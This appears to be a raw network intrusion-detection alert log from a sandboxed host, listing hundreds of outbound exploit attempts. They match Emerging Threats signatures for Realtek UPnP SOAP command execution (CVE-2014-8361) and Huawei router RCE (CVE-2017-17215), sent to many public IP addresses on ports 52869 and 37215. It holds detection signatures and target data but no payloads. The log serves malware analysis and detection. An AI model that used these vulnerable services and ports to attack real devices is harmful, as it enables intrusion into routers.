                                                07/20/24-23:05:52.551649TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5779852869192.168.2.14135.180.161.252
                                                07/20/24-23:05:56.960851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3547652869192.168.2.14209.32.151.5
                                                07/20/24-23:05:37.468386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24649052869192.168.2.14134.226.59.80
                                                07/20/24-23:05:40.338978TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25596252869192.168.2.1462.112.120.41
                                                07/20/24-23:06:09.714968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615086652869192.168.2.14115.182.22.138
                                                07/20/24-23:05:33.831807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144237215192.168.2.1441.21.217.171
                                                07/20/24-23:05:38.195370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614537052869192.168.2.1492.177.238.200
                                                07/20/24-23:05:59.213618TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5793052869192.168.2.14183.146.251.234
                                                07/20/24-23:05:36.052390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3423652869192.168.2.1459.135.63.153
                                                07/20/24-23:05:36.324297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501637215192.168.2.14197.24.185.83
                                                07/20/24-23:06:11.202361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616020052869192.168.2.14177.184.130.121
                                                07/20/24-23:06:18.694959TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613707852869192.168.2.1459.105.24.110
                                                07/20/24-23:05:37.455022TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24604052869192.168.2.14125.249.246.55
                                                07/20/24-23:06:05.658836TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23942852869192.168.2.1442.223.143.55
                                                07/20/24-23:05:56.120599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621037215192.168.2.14157.140.175.112
                                                07/20/24-23:05:58.997188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4084252869192.168.2.14152.29.165.10
                                                07/20/24-23:05:36.590112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892037215192.168.2.1441.116.190.228
                                                07/20/24-23:05:37.601961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4041252869192.168.2.14109.170.180.65
                                                07/20/24-23:05:59.141842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863252869192.168.2.1447.203.133.138
                                                07/20/24-23:06:15.141369TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25324052869192.168.2.14192.174.164.210
                                                07/20/24-23:06:30.714690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3435652869192.168.2.14113.244.48.233
                                                07/20/24-23:07:00.185152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5495452869192.168.2.14209.97.114.205
                                                07/20/24-23:06:27.200731TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416852869192.168.2.14117.253.38.147
                                                07/20/24-23:05:46.454459TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614032252869192.168.2.148.0.192.243
                                                07/20/24-23:05:59.042861TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24587852869192.168.2.14176.19.123.19
                                                07/20/24-23:06:02.735063TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25109852869192.168.2.14152.214.0.28
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546037215192.168.2.14157.8.17.200
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970837215192.168.2.14171.54.94.232
                                                07/20/24-23:06:13.638173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5349252869192.168.2.14140.187.97.113
                                                07/20/24-23:06:02.182231TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6089452869192.168.2.14126.57.33.85
                                                07/20/24-23:06:01.772858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4681852869192.168.2.14216.197.0.6
                                                07/20/24-23:05:45.680095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615868452869192.168.2.14182.254.22.233
                                                07/20/24-23:06:01.862638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24716852869192.168.2.1414.220.33.65
                                                07/20/24-23:05:42.257817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092437215192.168.2.1441.16.230.87
                                                07/20/24-23:05:59.082446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23904252869192.168.2.14141.93.218.139
                                                07/20/24-23:05:52.444445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24233052869192.168.2.1494.30.138.165
                                                07/20/24-23:06:32.610183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613757652869192.168.2.14221.140.145.154
                                                07/20/24-23:05:48.800446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706837215192.168.2.14197.18.168.39
                                                07/20/24-23:05:57.565663TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26027852869192.168.2.1414.105.61.250
                                                07/20/24-23:05:40.322089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25133652869192.168.2.144.234.130.62
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082637215192.168.2.14157.27.96.13
                                                07/20/24-23:06:08.296284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615641852869192.168.2.14133.5.180.131
                                                07/20/24-23:06:01.303827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615215452869192.168.2.14155.99.8.58
                                                07/20/24-23:05:33.835674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700237215192.168.2.14197.178.185.152
                                                07/20/24-23:05:33.861759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949237215192.168.2.14157.208.177.172
                                                07/20/24-23:06:19.817334TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614802252869192.168.2.14137.15.168.190
                                                07/20/24-23:05:57.619304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5481652869192.168.2.14175.103.230.10
                                                07/20/24-23:06:00.147952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615819452869192.168.2.1414.217.3.16
                                                07/20/24-23:06:00.486746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614642652869192.168.2.14147.98.124.138
                                                07/20/24-23:06:11.551203TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5655452869192.168.2.14176.101.171.67
                                                07/20/24-23:05:34.664378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998037215192.168.2.14197.21.229.2
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056437215192.168.2.14169.144.75.68
                                                07/20/24-23:05:37.601961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24855452869192.168.2.14168.99.192.8
                                                07/20/24-23:06:15.811024TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24015252869192.168.2.14139.35.146.241
                                                07/20/24-23:05:45.147931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5469052869192.168.2.14207.195.83.121
                                                07/20/24-23:07:37.539445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4931852869192.168.2.14148.3.109.194
                                                07/20/24-23:05:48.261264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615554452869192.168.2.1444.18.231.106
                                                07/20/24-23:05:45.435097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434237215192.168.2.14197.107.175.122
                                                07/20/24-23:06:16.051223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725037215192.168.2.14197.181.54.80
                                                07/20/24-23:05:52.589589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246652869192.168.2.1451.78.128.224
                                                07/20/24-23:05:58.394422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4753852869192.168.2.1468.139.170.193
                                                07/20/24-23:07:25.713951TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23392252869192.168.2.14110.56.95.238
                                                07/20/24-23:06:02.324702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4181852869192.168.2.14166.90.41.67
                                                07/20/24-23:05:52.528818TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23710852869192.168.2.14210.13.132.2
                                                07/20/24-23:05:40.326086TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3576252869192.168.2.1425.203.5.43
                                                07/20/24-23:05:40.457644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24628452869192.168.2.14161.222.69.144
                                                07/20/24-23:05:46.815988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615737452869192.168.2.14144.116.128.187
                                                07/20/24-23:06:33.839791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4729852869192.168.2.14132.28.34.172
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550437215192.168.2.1490.121.157.161
                                                07/20/24-23:05:35.740389TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4299852869192.168.2.14123.111.19.233
                                                07/20/24-23:07:31.848052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4556452869192.168.2.14169.204.117.167
                                                07/20/24-23:06:19.714340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613427852869192.168.2.14130.55.222.14
                                                07/20/24-23:07:15.422064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4531252869192.168.2.14107.111.90.22
                                                07/20/24-23:05:38.429491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3670452869192.168.2.14175.146.247.15
                                                07/20/24-23:05:46.536983TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615914052869192.168.2.14194.100.123.200
                                                07/20/24-23:05:59.080968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3571652869192.168.2.14148.192.90.183
                                                07/20/24-23:05:34.625708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788037215192.168.2.14157.162.164.93
                                                07/20/24-23:05:46.088778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618037215192.168.2.14175.92.108.78
                                                07/20/24-23:05:52.443193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4596252869192.168.2.1445.94.223.106
                                                07/20/24-23:05:33.827209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536637215192.168.2.1431.226.75.152
                                                07/20/24-23:05:58.174966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615462052869192.168.2.14160.37.99.47
                                                07/20/24-23:05:57.134757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5550252869192.168.2.1437.248.27.96
                                                07/20/24-23:05:37.497829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24444052869192.168.2.14123.111.19.233
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623837215192.168.2.14108.243.78.89
                                                07/20/24-23:06:02.063033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613890252869192.168.2.14139.247.75.28
                                                07/20/24-23:06:12.826285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615473252869192.168.2.1478.50.122.206
                                                07/20/24-23:05:52.488878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3907052869192.168.2.14120.185.72.185
                                                07/20/24-23:05:34.625708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958037215192.168.2.1414.63.31.137
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679037215192.168.2.14157.221.102.153
                                                07/20/24-23:05:58.627537TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25487052869192.168.2.1414.148.136.80
                                                07/20/24-23:05:36.070537TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613512052869192.168.2.14162.47.82.104
                                                07/20/24-23:05:39.482560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5609452869192.168.2.1458.46.182.160
                                                07/20/24-23:06:04.419011TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24373652869192.168.2.14190.112.31.150
                                                07/20/24-23:06:14.162873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3744452869192.168.2.1466.35.203.54
                                                07/20/24-23:06:00.123303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3731652869192.168.2.14173.165.96.254
                                                07/20/24-23:05:39.470987TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3910052869192.168.2.14107.127.41.70
                                                07/20/24-23:06:06.796614TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614926852869192.168.2.1435.138.240.228
                                                07/20/24-23:06:22.925505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069652869192.168.2.14148.83.111.89
                                                07/20/24-23:05:45.798059TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356252869192.168.2.1493.192.213.30
                                                07/20/24-23:05:40.451363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4375052869192.168.2.14115.51.161.31
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705637215192.168.2.1441.242.177.178
                                                07/20/24-23:06:06.490951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5428852869192.168.2.1418.128.175.69
                                                07/20/24-23:06:34.929510TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25079452869192.168.2.14205.207.74.168
                                                07/20/24-23:06:01.465127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614591252869192.168.2.14150.243.199.82
                                                07/20/24-23:05:46.119639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914837215192.168.2.14197.163.192.3
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576037215192.168.2.14157.190.138.68
                                                07/20/24-23:06:01.215644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4076252869192.168.2.14164.140.163.126
                                                07/20/24-23:05:37.593936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5581252869192.168.2.1441.152.208.190
                                                07/20/24-23:05:40.468265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25587652869192.168.2.1492.247.141.149
                                                07/20/24-23:05:59.046185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23478452869192.168.2.144.4.30.157
                                                07/20/24-23:06:30.760053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4252852869192.168.2.14154.174.220.159
                                                07/20/24-23:05:57.032993TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25445852869192.168.2.1484.68.245.96
                                                07/20/24-23:05:40.430092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25060652869192.168.2.1467.159.158.152
                                                07/20/24-23:05:36.272821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4629652869192.168.2.14216.11.155.229
                                                07/20/24-23:06:14.723902TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613853052869192.168.2.1491.87.105.89
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586637215192.168.2.1476.72.52.30
                                                07/20/24-23:05:58.755466TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613628052869192.168.2.1431.155.247.160
                                                07/20/24-23:05:39.536315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569252869192.168.2.14192.120.138.130
                                                07/20/24-23:05:57.144593TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615888852869192.168.2.14125.131.87.203
                                                07/20/24-23:07:27.665768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25210052869192.168.2.14204.45.41.209
                                                07/20/24-23:06:00.459661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3730452869192.168.2.14201.78.138.208
                                                07/20/24-23:06:26.204720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4949652869192.168.2.1449.174.125.250
                                                07/20/24-23:05:57.034294TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25662452869192.168.2.14155.244.161.196
                                                07/20/24-23:05:57.534062TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23284252869192.168.2.14208.177.199.121
                                                07/20/24-23:05:37.468386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25087052869192.168.2.1481.167.63.48
                                                07/20/24-23:05:36.443094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3365052869192.168.2.1437.213.85.230
                                                07/20/24-23:05:59.954497TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3719252869192.168.2.14173.165.96.254
                                                07/20/24-23:06:03.606709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23681652869192.168.2.1468.106.50.107
                                                07/20/24-23:05:52.443193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25635252869192.168.2.1499.220.189.230
                                                07/20/24-23:05:35.998652TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613484452869192.168.2.1431.136.109.228
                                                07/20/24-23:05:39.061893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077437215192.168.2.14197.21.227.72
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4686837215192.168.2.14199.160.159.12
                                                07/20/24-23:05:40.446932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24704452869192.168.2.1489.172.236.176
                                                07/20/24-23:06:02.025297TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5640852869192.168.2.14118.217.130.214
                                                07/20/24-23:06:02.841574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615044652869192.168.2.1438.57.241.117
                                                07/20/24-23:06:10.376181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5386652869192.168.2.14175.89.209.205
                                                07/20/24-23:05:59.457721TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25689852869192.168.2.14175.190.32.228
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608037215192.168.2.14197.112.3.242
                                                07/20/24-23:05:52.575727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3499052869192.168.2.1445.216.246.4
                                                07/20/24-23:06:25.803945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615424652869192.168.2.14210.91.190.210
                                                07/20/24-23:05:57.906796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4414852869192.168.2.14191.158.120.67
                                                07/20/24-23:06:38.097414TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5234852869192.168.2.14179.199.183.88
                                                07/20/24-23:06:17.589156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3580052869192.168.2.14147.197.189.218
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341437215192.168.2.14157.130.208.54
                                                07/20/24-23:05:58.253380TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615875452869192.168.2.1463.83.58.182
                                                07/20/24-23:05:37.449834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23497852869192.168.2.14207.28.189.232
                                                07/20/24-23:05:47.016775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883437215192.168.2.14210.124.66.194
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190837215192.168.2.14197.33.136.186
                                                07/20/24-23:05:50.528919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683637215192.168.2.1441.211.66.76
                                                07/20/24-23:05:59.404139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5607052869192.168.2.14192.95.119.34
                                                07/20/24-23:06:03.193739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613801652869192.168.2.14217.202.73.187
                                                07/20/24-23:05:45.633200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812052869192.168.2.1457.134.107.229
                                                07/20/24-23:05:50.533759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836037215192.168.2.14157.204.24.88
                                                07/20/24-23:05:52.515632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25792652869192.168.2.1413.248.239.26
                                                07/20/24-23:06:05.981181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083852869192.168.2.1414.164.85.37
                                                07/20/24-23:05:48.841499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836837215192.168.2.1472.227.183.5
                                                07/20/24-23:06:53.015066TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614298052869192.168.2.1450.153.196.242
                                                07/20/24-23:05:48.026941TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614996852869192.168.2.1465.189.243.195
                                                07/20/24-23:06:01.391419TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615529452869192.168.2.1444.160.30.244
                                                07/20/24-23:05:33.857328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524637215192.168.2.14197.23.105.2
                                                07/20/24-23:05:38.003073TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4985452869192.168.2.1477.83.231.0
                                                07/20/24-23:06:03.131821TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615796052869192.168.2.149.221.216.212
                                                07/20/24-23:05:57.158457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4667652869192.168.2.1414.220.33.65
                                                07/20/24-23:05:38.508603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615770452869192.168.2.14163.148.202.115
                                                07/20/24-23:06:20.550859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614258252869192.168.2.14147.137.69.216
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.14105.92.104.21
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042237215192.168.2.14197.6.180.11
                                                07/20/24-23:06:04.825020TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4869252869192.168.2.14130.9.41.235
                                                07/20/24-23:06:08.137793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23887252869192.168.2.1453.235.185.131
                                                07/20/24-23:05:45.169432TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614082452869192.168.2.1460.123.7.240
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437637215192.168.2.14197.241.45.150
                                                07/20/24-23:05:45.386529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4492637215192.168.2.14197.58.188.133
                                                07/20/24-23:05:52.478141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4732452869192.168.2.14207.210.54.245
                                                07/20/24-23:05:58.104584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5359852869192.168.2.1412.166.141.196
                                                07/20/24-23:06:07.663982TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5413852869192.168.2.14222.16.169.125
                                                07/20/24-23:06:00.187277TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613661052869192.168.2.1413.13.248.159
                                                07/20/24-23:05:57.188540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558652869192.168.2.1485.33.92.254
                                                07/20/24-23:05:45.142955TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613912452869192.168.2.14169.220.199.128
